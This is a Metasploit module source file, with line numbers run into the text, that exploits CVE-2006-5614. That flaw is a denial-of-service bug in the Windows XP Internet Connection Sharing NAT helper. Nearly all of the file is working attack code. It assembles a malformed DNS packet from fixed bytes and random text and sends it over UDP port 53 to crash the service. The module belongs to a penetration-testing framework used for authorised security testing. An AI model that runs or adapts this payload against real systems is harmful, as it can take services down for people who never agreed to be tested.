Path: blob/master/modules/auxiliary/dos/windows/nat/nat_helper.rb
21549 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Microsoft Windows NAT Helper Denial of Service',14'Description' => %q{15This module exploits a denial of service vulnerability16within the Internet Connection Sharing service in17Windows XP.18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'References' => [22[ 'OSVDB', '30096'],23[ 'BID', '20804' ],24[ 'CVE', '2006-5614' ],25],26'DisclosureDate' => '2006-10-26',27'Notes' => {28'Stability' => [CRASH_SERVICE_DOWN],29'SideEffects' => [],30'Reliability' => []31}32)33)3435register_options([Opt::RPORT(53),])36end3738def run39connect_udp4041pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"42pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"43pkt << Rex::Text.rand_text_english(10) + "\x03"44pkt << Rex::Text.rand_text_english(3)45pkt << "\x00\x00\x01\x00\x01"4647print_status('Sending dos packet...')4849udp_sock.put(pkt)5051disconnect_udp52end53end545556